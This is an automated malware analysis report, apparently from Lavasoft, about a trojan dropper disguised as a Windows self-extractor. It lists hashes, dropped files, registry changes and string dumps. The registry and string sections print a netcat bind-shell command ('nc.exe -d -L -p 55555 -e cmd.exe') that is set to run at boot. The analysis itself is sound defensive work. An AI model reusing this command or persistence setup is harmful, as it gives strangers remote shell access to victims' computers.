RemoteAdmin.Win32.NetCat_1d23a57973 – Adaware

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.FAkeAlert.105 (AdAware), Backdoor.Win32.PcClient.FD, RemoteAdmin.Win32.NetCat.FD, SpyTool.Win32.Ardamax.FD, GenericEmailWorm.YR, RemoteAdminNetCat.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, RemoteAdmin, Worm, EmailWorm, SpyTool

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 1d23a57973153cdfb24c05c9c3c5e2f4

SHA1: 70708f86e80f2a26b522354769afb945fec8935a

SHA256: e7999726d14f963e988cc6211138ec70cf084d0ebd4e2f0b7e9aa32c94e38c20

SSDeep: 49152:1MSFFNLrUrfcnwFC4K2 vwJKcNMwAbfpH9Ou8N:ySfNLrUQnl12uYww8Oh

Size: 1906688 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: Kevin Solway

Created at: 2008-04-13 21:32:45

Analyzed on: WindowsXP SP3 32-bit

Summary: RemoteAdmin. A system tool used to allow remote access or control of computer systems.

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The RemoteAdmin creates the following process(es):

nc.exe:1932
%original file name%.exe:580
virus.exe:1224
regedit.exe:972

The RemoteAdmin injects its code into the following process(es):

ALW.exe:1160
rundll32.exe:1532

File activity

The process %original file name%.exe:580 makes changes in the file system.

The RemoteAdmin creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)

The process virus.exe:1224 makes changes in the file system.

The RemoteAdmin creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes)

Registry activity

The process nc.exe:1932 makes changes in the system registry.

The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 14 48 BA 2A 49 22 43 BB E9 C6 A9 A7 D1 F8"

The process ALW.exe:1160 makes changes in the system registry.

The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE 10 72 B9 94 99 59 34 40 69 8C 05 6E 3B 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"

The process %original file name%.exe:580 makes changes in the system registry.

The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 CF 8E BC 38 29 58 01 76 B3 89 D7 E9 08 6E 36"

To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process virus.exe:1224 makes changes in the system registry.

The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 08 85 B2 97 72 FA E1 C8 65 20 9A 2F F2 CA 5B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\ITKVAP]
"ALW.exe" = "ALW"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The RemoteAdmin modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The RemoteAdmin modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The RemoteAdmin modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process regedit.exe:972 makes changes in the system registry.

The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB BD 4D 05 69 23 3B AA 1D FB FB 29 40 F8 7E E8"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "c:\windows\system32\index1.html"

To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"

"Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com"

The process rundll32.exe:1532 makes changes in the system registry.

The RemoteAdmin creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 61 02 5C 4F 7A F7 C2 27 B2 B6 74 ED 4C FC F2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5	File path
1c902448ba8c2385602c8f5315f35204	c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.01
d92e93f974e833bb6b9cae597fcf8a49	c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.02
bb251a9f308d046931dcba40fb1e0450	c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.exe
e0fb946c00b140693e3cf5de258c22a1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\nc.exe
6fbb7d7530f7362b5495006fc5bb7909	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\virus.exe
e0fb946c00b140693e3cf5de258c22a1	c:\WINDOWS\system32\nc.exe
6fbb7d7530f7362b5495006fc5bb7909	c:\WINDOWS\system32\virus.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Static Analysis

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.5512
Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.5512 (xpsp.080413-2105)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Spanish (Spain, International Sort)

Company Name: Microsoft CorporationProduct Name: HD Player Product Version: 6.00.2900.5512Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.Legal Trademarks: Original Filename: WEXTRACT.EXE Internal Name: Wextract File Version: 6.00.2900.5512 (xpsp.080413-2105)File Description: Win32 Cabinet Self-Extractor Comments: Language: Spanish (Spain, International Sort)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	39368	39424	4.5598	25b5d82208cedbbbc7ee430a4202819c
.data	45056	7140	1024	2.94449	99858e86526942a66950c7139f78a725
.rsrc	53248	1867776	1865216	5.5405	012b992d76feb456da9e4e33b0ff74f1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Map

The RemoteAdmin connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_580:

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

COMCTL32.dll

VERSION.dll

advapi32.dll

advpack.dll

wininit.ini

Software\Microsoft\Windows\CurrentVersion\App Paths

setupapi.dll

setupx.dll

IXPd.TMP

TMP4351$.TMP

FINISHMSG

USRQCMD

ADMQCMD

msdownld.tmp

wextract.pdb

PSSSSSSh

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

RegQueryInfoKeyA

GetWindowsDirectoryA

ExitWindowsEx

MsgWaitForMultipleObjects

rundll32.exe %s,InstallHinfSection %s 128 %s

SHELL32.DLL

Software\Microsoft\Windows\CurrentVersion\RunOnce

PendingFileRenameOperations

System\CurrentControlSet\Control\Session Manager\FileRenameOperations

wextract_cleanup%d

%s /D:%s

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"

Command.com /c %s

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\

foto.jpg

INDEXH~1.TXT

nc.exe

virus.exe

wsetup.cmd

. &.#&'&

UeXe

9Eu%x

8E%SH<</pre><pre>lO)%u</pre><pre>-]aRZ</pre><pre>}-u"=-9}</pre><pre>K.pf1</pre><pre>-K}FM</pre><pre>s.fJO}</pre><pre>.UK!R</pre><pre>%.oC3![*</pre><pre>.mKIz</pre><pre>.WY%]</pre><pre>R.lqZ</pre><pre>E.Pq}#</pre><pre>P{).ZDF</pre><pre>T%Fn:</pre><pre>2c.ncl</pre><pre>.CB!X</pre><pre>%sUvh</pre><pre>0@{%X</pre><pre>2k%uHyX9</pre><pre>'9h.nw</pre><pre>2.nKa</pre><pre>vs^f.et</pre><pre>.FBn6QN</pre><pre>38.GT</pre><pre>^*.BQ</pre><pre>1*/.zx></pre><pre>#7.iZ2j</pre><pre>.lx\,</pre><pre>4T%_%u"H</pre><pre>eAswM.hL</pre><pre>%ZW{%x6</pre><pre><q3><pre>5#h.Gu</pre><pre>n9%dO</pre><pre>.iSqO</pre><pre>ssy-)p\.FG</pre><pre>%ueT~C</pre><pre>1.lD,</pre><pre>I.TBvZ</pre><pre>7.OSW</pre><pre>%XPkvR</pre><pre>j.TMfGt</pre><pre>B*.fYx</pre><pre>{,/7[(]6</pre><pre>7=v%sc</pre><pre>j8.rf</pre><pre>E.iHS</pre><pre>,.yZ2</pre><pre>= =%D</pre><pre>.Qj`H%</pre><pre>%s;JA</pre><pre>B)L9%X</pre><pre>^5p8uLR%X.</pre><pre>*^ h%U}</pre><pre>.sGHRN</pre><pre>Ap.stt</pre><pre>.EH /</pre><pre>.kb,)q</pre><pre>wWyC^M.tKG</pre><pre>%x]X*K</pre><pre>.vh(j</pre><pre>9.JZ_3</pre><pre>lm.Fx</pre><pre>kJ8H%S</pre><pre>ZkÊ</pre><pre>bkEyQ</pre><pre>6P%s\</pre><pre>=C.ve</pre><pre>3%uCen</pre><pre>(Æ@</pre><pre> .%U=</pre><pre>.sn$j</pre><pre>67:%c</pre><pre>g.bc%</pre><pre>.Hv{i</pre><pre>ÂT7=</pre><pre>%8.wDI</pre><pre>0K%u3</pre><pre>r.iCW</pre><pre>v.FoQ</pre><pre>g}3%S</pre><pre>9B%x!</pre><pre>UkX%FU!C</pre><pre>E%uW8x</pre><pre>Hg.vbL#</pre><pre>'x$z9!.fM></pre><pre>Z9msG</pre><pre>%Sqz)</pre><pre>\Sn%D</pre><pre>w1O.kk</pre><pre>_F.uSt</pre><pre>G;crt</pre><pre>.gGwW</pre><pre>k.SZ9</pre><pre>A}%Sz</pre><pre>ky`%f</pre><pre>ht.Ic</pre><pre>p.GrYjD</pre><pre>.uhz.</pre><pre>ÓIo</pre><pre>r.Xh^</pre><pre>NWFE%X</pre><pre><p%C t><pre>,.kR~</pre><pre>K("M.WE</pre><pre>.yt7T</pre><pre>/s%x,</pre><pre>%FuPC</pre><pre>P)>%UL</pre><pre>s*Y:oójJ</pre><pre>C.bMK</pre><pre>.st2yI</pre><pre>7Cx%U</pre><pre>1_.ep</pre><pre>zt%umUw..</pre><pre>VdZ-Tw}</pre><pre>z.LTw</pre><pre>l%US#</pre><pre>.jiY>K</pre><pre>^9v%uA</pre><pre>@-tcP</pre><pre>_.oI@</pre><pre>1.Lf;</pre><pre>hw.VR</pre><pre>.aDOE</pre><pre>%s @U</pre><pre>.Lw52</pre><pre>.BGCw{</pre><pre>3.Xxd</pre><pre>S8%xK</pre><pre>%CYf;</pre><pre>.Naz(gB</pre><pre>.pDEaI</pre><pre>%b.Wr</pre><pre>.Bv L</pre><pre>2%u'?aE#</pre><pre>GsN*.xr</pre><pre>W&.BqQ</pre><pre>-J}VM></pre><pre>\.zMq</pre><pre>Ã><</pre><pre>$;.Dk</pre><pre>tQP%f</pre><pre>?7@Ï</pre><pre>h;u%S</pre><pre>n?A%S</pre><pre>6&.jT9</pre><pre>%XW`g1</pre><pre>w6.Oh</pre><pre>UR%.c</pre><pre>H.gP`</pre><pre>1%uS9U</pre><pre>JUcpa=%u</pre><pre> $%fk</pre><pre>mb%Uf</pre><pre>EeUw</pre><pre>.mGv{@</pre><pre>_.JD\</pre><pre>.aL,f</pre><pre>.Fq'></pre><pre>YKr%Sj</pre><pre>7E,%X</pre><pre>n de espacio en: %s.</pre><pre>Mensaje de sistema: %s.5No se puede encontrar uno de los recursos necesarios.#</pre><pre>n del sistema operativo./Error en la solicitud de asignaci</pre><pre>n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio primero y presione Reintentar, o presione Cancelar para salir del programa de instalaci</pre><pre>n.XLa carpeta no es v</pre><pre>rese de que la carpeta existe y se puede escribir en ella.DDebe especificar una carpeta con la ruta completa o elegir Cancelar.</pre><pre>n de carpeta.DNo se puede cargar las funciones requeridas por el di</pre><pre>logo Examinar.\No se pudo cargar el archivo Shell32.dll, requerido por el cuadro de di</pre><pre>n del proceso <%s>. Causa: %s5El tama</pre><pre>ster en este sistema no es soportado.3Uno de los recursos necesarios parece estar da</pre><pre>ado.[Es necesario Windows 95 o Windows NT 4.0 Beta 2 o posterior para realizar esta instalaci</pre><pre>Error al cargar %s]Error de GetProcAddress() en funci</pre><pre>n "%s". Causa posible: versi</pre><pre>n incorrecta de advpack.dll.@Es necesario Windows 95 o Windows NT para instalar este producto No se pudo crear la carpeta "%s"</pre><pre>Para instalar este programa, necesita %s KB disponibles en la unidad %s. Es recomendable que libere la cantidad necesaria de espacio en disco antes de continuar.</pre><pre>n de la carpeta de Windows</pre><pre>)Apagar NT: Error en token de OpenProcess.*Apagar NT: Error en AdjustTokenPrivileges."Apagar NT: Error en ExitWindowsEx.</pre><pre>n del archivo. Probablemente se deba a un problema de memoria baja (poco espacio en disco para el intercambio de archivos) o un archivo .CAB da</pre><pre>ado.wEl programa de instalaci</pre><pre>n del volumen para la unidad (%s) .</pre><pre>Mensaje del sistema: %s.</pre><pre>n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio e int</pre><pre>ntelo de nuevo.hEl programa de instalaci</pre><pre>[Otra copia del paquete "%s" ya est</pre><pre>Desea ejecutar otra copia?$No se pudo encontrar el archivo: %s.</pre><pre> No existe la carpeta "%s".</pre><pre>Desea crearla?lOtra copia del paquete "%s" ya est</pre><pre>lo es posible ejecutar una copia a la vez.OEl paquete "%s" no es compatible con la versi</pre><pre>n de Windows que est</pre><pre>ejecutando.^El paquete "%s" no es compatible con la versi</pre><pre>n del archivo %s que se encuentra en su sistema.</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>WEXTRACT.EXE</pre><pre>Sistema operativo Microsoft</pre><pre>Windows</pre><pre>6.00.2900.5512</pre>cmd.exe_1116:<pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>msvcrt.dll</pre><pre>USER32.dll</pre><pre>SetConsoleInputExeNameW</pre><pre>APerformUnaryOperation: '%c'</pre><pre>APerformArithmeticOperation: '%c'</pre><pre>ADVAPI32.dll</pre><pre>SHELL32.dll</pre><pre>MPR.dll</pre><pre>RegEnumKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>RegOpenKeyW</pre><pre>RegCreateKeyExW</pre><pre>RegOpenKeyExW</pre><pre>ShellExecuteExW</pre><pre>CmdBatNotification</pre><pre>GetWindowsDirectoryW</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>_pipe</pre><pre>GetProcessWindowStation</pre><pre>cmd.pdb</pre><pre>foto.jpg c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>oto.jpg\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpgus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpgexe andrescruzvtj@hotmail.com</pre><pre>foto.jpge andrescruzvtj@hotmail.com</pre><pre>foto.jpgndrescruzvtj@hotmail.com</pre><pre>foto.jpgvirus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpg -e cmd.exe</pre><pre>start /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>foto.jpg -L -p 55555 -e cmd.exe</pre><pre>foto.jpg.exe -d -L -p 55555 -e cmd.exe</pre><pre>foto.jpgxe -d -L -p 55555 -e cmd.exe</pre><pre>foto.jpg</pre><pre>foto.jpgxe andrescruzvtj@hotmail.com</pre><pre>foto.jpgm</pre><pre>foto.jpgtart /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>CMD Internal Error %s</pre><pre>)(&&())))(&))</pre><pre>)&((&)&))&())</pre><pre>)&((&)&)&()))</pre><pre>)(&&()))&))))</pre><pre>CMD.EXE</pre><pre>()|&=,;"</pre><pre>COPYCMD</pre><pre>\XCOPY.EXE</pre><pre>CMDCMDLINE</pre><pre>WKERNEL32.DLL</pre><pre>Software\Policies\Microsoft\Windows\System</pre><pre>0123456789</pre><pre>cmd.exe</pre><pre>DIRCMD</pre><pre>%d.%d.d</pre><pre>Ungetting: '%s'</pre><pre>DisableCMD</pre><pre>GeToken: (%x) '%s'</pre><pre>%s\Shell\Open\Command</pre><pre>%x %c</pre><pre>*** Unknown type: %x</pre><pre>Args: `%s'</pre><pre>Cmd: %s Type: %x</pre><pre>%s (%s) %s</pre><pre>oto.jpg</pre><pre>c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>ws\system32\nc.reg</pre><pre>32\nc.reg</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\foto.jpg</pre><pre>tmail.com</pre><pre>.com"</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP></pre><pre>.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH</pre><pre>%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark</pre><pre>ows\system32\nc.reg</pre><pre>m32\nc.reg</pre><pre>c.reg</pre><pre>CMDEXTVERSION</pre><pre>KEYS</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP</pre><pre>c:\windows\system32\virus.exe andrescruzvtj@hotmail.com</pre><pre>%s %s</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\virus.exe</pre><pre>(%s) %s</pre><pre>%s %s%s</pre><pre>&()[]{}^=;!%' ,`~</pre><pre>d%sd%s</pre><pre>-%sd%sd%sd</pre><pre>d%sd%sd</pre><pre>%s=%s</pre><pre>X-X</pre><pre>.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS</pre><pre><> -*/%()|^&=,</pre><pre>\CMD.EXE</pre><pre>Windows Command Processor</pre><pre>5.1.2600.5512 (xpsp.080413-2111)</pre><pre>Cmd.Exe</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>Press any key to continue . . . %0</pre><pre>operable program or batch file.</pre><pre>The system cannot execute the specified program.</pre><pre>and press any key when ready. %0</pre><pre>Microsoft Windows XP [Version %1]%0</pre><pre>a pipe operation.</pre><pre>KEYS is on.</pre><pre>KEYS is off.</pre><pre>The process tried to write to a nonexistent pipe.</pre><pre>The switch /Y may be preset in the COPYCMD environment variable.</pre><pre>to prompt on overwrites unless COPY command is being executed from</pre><pre>Switches may be preset in the DIRCMD environment variable. Override</pre><pre>Quits the CMD.EXE program (command interpreter) or the current batch</pre><pre>CMD.EXE. If executed from outside a batch script, it</pre><pre>will quit CMD.EXE</pre><pre>ERRORLEVEL that number. If quitting CMD.EXE, sets the process</pre><pre>Displays or sets a search path for executable files.</pre><pre>Type PATH ; to clear all search-path settings and direct cmd.exe to search</pre><pre>Changes the cmd.exe command prompt.</pre><pre>$B | (pipe)</pre><pre>$V Windows XP version number</pre><pre>Displays, sets, or removes cmd.exe environment variables.</pre><pre>Displays the Windows XP version.</pre><pre>Tells cmd.exe whether to verify that your files are written correctly to a</pre><pre>Records comments (remarks) in a batch file or CONFIG.SYS.</pre><pre>Press any key to continue . . . %0</pre><pre>Directs cmd.exe to a labeled line in a batch program.</pre><pre>NOT Specifies that Windows XP should carry out</pre><pre>will execute the command after the ELSE keyword if the</pre><pre>I The new environment will be the original environment passed</pre><pre>to the cmd.exe and not the current environment.</pre><pre>SEPARATE Start 16-bit Windows program in separate memory space</pre><pre>SHARED Start 16-bit Windows program in shared memory space</pre><pre>If it is an internal cmd command or a batch file then</pre><pre>the command processor is run with the /K switch to cmd.exe.</pre><pre>If it is not an internal cmd command or batch file then</pre><pre>parameters These are the parameters passed to the command/program</pre><pre>under Windows XP.</pre><pre>Starts a new instance of the Windows XP command interpreter</pre><pre>CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]</pre><pre>/D Disable execution of AutoRun commands from registry (see below)</pre><pre>/A Causes the output of internal commands to a pipe or file to be ANSI</pre><pre>/U Causes the output of internal commands to a pipe or file to be</pre><pre>variable var at execution time. The %var% syntax expands variables</pre><pre>of an executable file.</pre><pre>If /D was NOT specified on the command line, then when CMD.EXE starts, it</pre><pre>either or both are present, they are executed first.</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun</pre><pre>can enable or disable extensions for all invocations of CMD.EXE on a</pre><pre>following REG_DWORD values in the registry using REGEDT32.EXE:</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions</pre><pre>particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You</pre><pre>can enable or disable completion for all invocations of CMD.EXE on a</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion</pre><pre>at execution time.</pre><pre>CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable</pre><pre>completion for all invocations of CMD.EXE on a machine and/or user logon</pre><pre>the registry using REGEDT32.EXE:</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar</pre><pre>Shift key with the control character will move through the list</pre><pre>&()[]{}^=;!%' ,`~</pre><pre>Command Processor Extensions enabled by default. Use CMD /? for details.</pre><pre>ASSOC [.ext[=[fileType]]]</pre><pre>.ext Specifies the file extension to associate the file type with</pre><pre>ASSOC .pl=PerlScript</pre><pre>FTYPE PerlScript=perl.exe %%1 %%*</pre><pre>script.pl 1 2 3</pre><pre>set PATHEXT=.pl;%%PATHEXT%%</pre><pre>The restartable option to the COPY command is not supported by</pre><pre>this version of the operating system.</pre><pre>The following usage of the path operator in batch-parameter</pre><pre>The unicode output option to CMD.EXE is not supported by this</pre><pre>version of the operating system.</pre><pre>If Command Extensions are enabled the DATE command supports</pre><pre>If Command Extensions are enabled the TIME command supports</pre><pre>If Command Extensions are enabled the PROMPT command supports</pre><pre>is pretty simple and supports the following operations, in decreasing</pre><pre>! ~ - - unary operators</pre><pre>* / %% - arithmetic operators</pre><pre> - - arithmetic operators</pre><pre>&= ^= |= <<= >>=</pre><pre>If you use any of the logical or modulus operators, you will need to</pre><pre>values. If SET /A is executed from the command line outside of a</pre><pre>assignment operator requires an environment variable name to the left of</pre><pre>the assignment operator. Numeric values are decimal numbers, unless</pre><pre>occurrence of the remaining portion of str1.</pre><pre>Finally, support for delayed environment variable expansion has been</pre><pre>added. This support is always disabled by default, but may be</pre><pre>enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?</pre><pre>of text is read, not when it is executed. The following example</pre><pre>So the actual FOR loop we are executing is:</pre><pre>%Í%% - expands to the current directory string.</pre><pre>%ÚTE%% - expands to current date using same format as DATE command.</pre><pre>%%CMDEXTVERSION%% - expands to the current Command Processor Extensions</pre><pre>%%CMDCMDLINE%% - expands to the original command line that invoked the</pre><pre>If Command Extensions are enabled the SHIFT command supports</pre><pre>control is passed to the statement after the label specified. You must</pre><pre>%%4 %%5 ...)</pre><pre>CMD /? for details.</pre><pre>This works because on old versions of CMD.EXE, SETLOCAL does NOT</pre><pre>command execution.</pre><pre>non-executable files may be invoked through their file association just</pre><pre>by typing the name of the file as a command. (e.g. WORD.DOC would</pre><pre>launch the application associated with the .DOC file extension).</pre><pre>When executing an application that is a 32-bit GUI application, CMD.EXE</pre><pre>the command prompt. This new behavior does NOT occur if executing</pre><pre>When executing a command line whose first token is the string "CMD "</pre><pre>without an extension or path qualifier, then "CMD" is replaced with</pre><pre>the value of the COMSPEC variable. This prevents picking up CMD.EXE</pre><pre>When executing a command line whose first token does NOT contain an</pre><pre>extension, then CMD.EXE uses the value of the PATHEXT</pre><pre>.COM;.EXE;.BAT;.CMD</pre><pre>When searching for an executable, if there is no match on any extension,</pre><pre>If Command Extensions are enabled, and running on the Windows XP</pre><pre>forms of the FOR command are supported:</pre><pre>Walks the directory tree rooted at [drive:]path, executing the FOR</pre><pre>passes the first blank separated token from each line of each file.</pre><pre>is a quoted string which contains one or more 